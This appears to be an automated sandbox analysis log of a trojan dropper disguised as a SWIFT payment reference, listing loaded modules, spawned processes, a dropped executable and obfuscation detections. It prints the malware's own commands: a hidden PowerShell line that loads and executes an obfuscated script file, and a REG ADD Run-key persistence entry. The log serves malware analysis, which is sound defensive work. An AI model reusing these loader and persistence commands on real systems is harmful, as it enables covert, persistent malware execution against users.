      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Vitis.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Vitis.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Vitis.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Vitis.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Vitis.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Vitis.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Vitis.exeSection loaded: edputil.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Vitis.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Vitis.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Vitis.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Vitis.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Vitis.exeSection loaded: windows.staterepositoryps.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Vitis.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Vitis.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Vitis.exeSection loaded: appresolver.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Vitis.exeSection loaded: bcp47langs.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Vitis.exeSection loaded: slc.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Vitis.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Vitis.exeSection loaded: sppc.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Vitis.exeSection loaded: onecorecommonproxystub.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Vitis.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Vitis.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Vitis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Vitis.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Vitis.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Vitis.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Vitis.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Vitis.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Vitis.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Vitis.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Bortopereringer" /t REG_EXPAND_SZ /d "%Trimmere% -windowstyle minimized $storkenes=(Get-ItemProperty -Path 'HKCU:\Oxylabrax\').Discumber;%Trimmere% ($storkenes)"
      Source: classification engineClassification label: mal100.troj.winEXE@13/11@1/1
      Source: C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exeCode function: 0_2_004034F7 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004034F7
      Source: C:\Users\user\AppData\Local\Temp\Vitis.exeCode function: 7_2_004034F7 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,7_2_004034F7
      Source: C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exeCode function: 0_2_00404954 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_00404954
      Source: C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exeCode function: 0_2_004021AA CoCreateInstance,0_2_004021AA
      Source: C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exeFile created: C:\Users\user\Pictures\timetallenes.lnkJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5440:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7576:120:WilError_03
      Source: C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exeFile created: C:\Users\user\AppData\Local\Temp\nsd14E9.tmpJump to behavior
      Source: New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
      Source: C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exeFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exeReversingLabs: Detection: 57%
      Source: C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exeFile read: C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exeJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe
      Source: C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe" -windowstyle hidden "$Nonfading=Get-Content 'C:\Users\user\AppData\Local\Temp\medlemskartotek\vejmaterialerne\Profilen127.Aff';$Bakkants=$Nonfading.SubString(17286,3);.$Bakkants($Nonfading)
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe" /c "set /A 1^^0
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\Vitis.exe C:\Users\user\AppData\Local\Temp\Vitis.exe
      Source: C:\Users\user\AppData\Local\Temp\Vitis.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Bortopereringer" /t REG_EXPAND_SZ /d "%Trimmere% -windowstyle minimized $storkenes=(Get-ItemProperty -Path 'HKCU:\Oxylabrax\').Discumber;%Trimmere% ($storkenes)
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Bortopereringer" /t REG_EXPAND_SZ /d "%Trimmere% -windowstyle minimized $storkenes=(Get-ItemProperty -Path 'HKCU:\Oxylabrax\').Discumber;%Trimmere% ($storkenes)"
      Source: C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe" -windowstyle hidden "$Nonfading=Get-Content 'C:\Users\user\AppData\Local\Temp\medlemskartotek\vejmaterialerne\Profilen127.Aff';$Bakkants=$Nonfading.SubString(17286,3);.$Bakkants($Nonfading)Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe" /c "set /A 1^^0Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\Vitis.exe C:\Users\user\AppData\Local\Temp\Vitis.exeJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Vitis.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Bortopereringer" /t REG_EXPAND_SZ /d "%Trimmere% -windowstyle minimized $storkenes=(Get-ItemProperty -Path 'HKCU:\Oxylabrax\').Discumber;%Trimmere% ($storkenes)Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Bortopereringer" /t REG_EXPAND_SZ /d "%Trimmere% -windowstyle minimized $storkenes=(Get-ItemProperty -Path 'HKCU:\Oxylabrax\').Discumber;%Trimmere% ($storkenes)"Jump to behavior
      Source: C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
      Source: timetallenes.lnk.0.drLNK file: ..\..\..\Program Files (x86)\Common Files\Tankvognskrselsulykke.geo
      Source: sans.lnk.0.drLNK file: ..\..\Users\user\AppData\Local\Temp\truede.une
      Source: timetallenes.lnk0.0.drLNK file: ..\..\..\Program Files (x86)\Common Files\Tankvognskrselsulykke.geo
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
      Source: New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000001.00000002.2592272811.0000000000B3E000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000001.00000002.2599516690.0000000008435000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: indows\System.Core.pdb source: powershell.exe, 00000001.00000002.2596714001.000000000712F000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.Core.pdb source: powershell.exe, 00000001.00000002.2592272811.0000000000B05000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: tem.Core.pdbN source: powershell.exe, 00000001.00000002.2596714001.000000000712F000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000001.00000002.2596714001.00000000070C0000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.Core.pdbk source: powershell.exe, 00000001.00000002.2592272811.0000000000B05000.00000004.00000020.00020000.00000000.sdmp

      Data Obfuscation

      barindex
      Source: Yara matchFile source: 00000007.00000002.2926040964.00000000018C7000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000001.00000002.2601234406.0000000008F67000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe" /c "set /A 1^^0
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe" /c "set /A 1^^0Jump to behavior
      Source: C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe" -windowstyle hidden "$Nonfading=Get-Content 'C:\Users\user\AppData\Local\Temp\medlemskartotek\vejmaterialerne\Profilen127.Aff';$Bakkants=$Nonfading.SubString(17286,3);.$Bakkants($Nonfading)
      Source: C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe" -windowstyle hidden "$Nonfading=Get-Content 'C:\Users\user\AppData\Local\Temp\medlemskartotek\vejmaterialerne\Profilen127.Aff';$Bakkants=$Nonfading.SubString(17286,3);.$Bakkants($Nonfading)Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_07387739 push 8B059E24h; iretd 1_2_0738774E
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_073875E6 pushad ; ret 1_2_073875E9
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_0738F934 push es; iretd 1_2_0738F937
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\Vitis.exeJump to dropped file
      Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run BortopereringerJump to behavior
      Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run BortopereringerJump to behavior
      Source: C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Vitis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
